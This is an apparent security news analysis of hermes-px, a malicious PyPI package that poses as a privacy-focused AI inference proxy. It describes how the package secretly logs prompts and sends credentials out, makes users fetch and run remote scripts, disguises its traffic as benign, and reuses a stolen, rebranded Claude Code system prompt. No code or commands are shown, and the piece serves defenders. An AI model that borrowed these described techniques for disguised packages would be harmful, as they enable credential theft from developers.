Detailed Analysis
A malicious Python package named **hermes-px**, discovered on the Python Package Index (PyPI), poses as a legitimate "Secure AI Inference Proxy" while covertly stealing developer data and exploiting a stolen version of Anthropic's proprietary Claude system prompt. The package markets itself as a privacy-enhancing tool that routes AI inference requests through the Tor network, complete with an API interface mimicking the OpenAI Python SDK and RAG pipeline examples designed to appear credible to developers. Beneath this façade, however, hermes-px invisibly logs every user prompt submitted through it and exfiltrates the captured data — including credentials, API keys, proprietary source code, internal URLs, and personal information — to attacker-controlled infrastructure. The package also instructs users to fetch and execute a remote script from a GitHub URL, a technique that enables dynamic payload delivery and allows attackers to update malicious functionality without modifying the package itself.
One of the most technically distinctive elements of this attack is the inclusion of a 246,000-character compressed file, `base_prompt.pz`, that decompresses into a near-verbatim copy of Anthropic's Claude Code system prompt — one of the company's closely guarded proprietary assets. The attackers partially rebranded the stolen prompt, substituting "Claude" references with "AXIOM-1," but forensic indicators including original function names, sandbox directory paths, and residual "Claude" references confirm its authentic origin. This appropriation of a legitimate, sophisticated system prompt serves a dual purpose: it lends the fake proxy tool a veneer of technical authenticity that could deceive developers, and it weaponizes Anthropic's own engineering investment to make the malicious agent behave convincingly while harvesting data. Exfiltrated content is transmitted alongside encrypted payloads mimicking university chatbot communications, a layer of obfuscation designed to blend malicious traffic with benign-looking network activity.
The attack is significant because it targets the software supply chain at a moment when AI tooling adoption among developers is accelerating rapidly. Developers integrating large language model capabilities into their workflows routinely pass sensitive material through AI proxies — including database credentials, internal API keys, and proprietary business logic — making this attack surface particularly high-value. The use of PyPI as a distribution vector is consistent with a well-documented pattern of supply chain attacks in which threat actors publish convincingly named packages to intercept developers searching for legitimate AI utilities. The hermes-px campaign demonstrates that as AI development tooling proliferates, it creates new categories of trust relationships that attackers can exploit: a developer who believes they are routing prompts through a privacy-preserving proxy has every reason to send more sensitive material, not less.
The theft and weaponization of Anthropic's Claude Code system prompt raises broader questions about the security of proprietary AI assets and how leaked or stolen system prompts can be repurposed maliciously. System prompts increasingly encode substantial engineering effort, behavioral guardrails, and competitive intellectual property, and their exposure — whether through prompt injection, insider leaks, or reverse engineering — creates downstream risks that extend beyond any single deployment. For Anthropic specifically, having its internal prompt architecture replicated inside a malware campaign represents both a reputational concern and a practical signal that its systems are being closely studied by adversarial actors. Security researchers and developers are advised to immediately uninstall hermes-px, rotate all credentials and API keys that may have passed through the package, and audit conversation histories for any sensitive disclosures made during its use.
Read original article →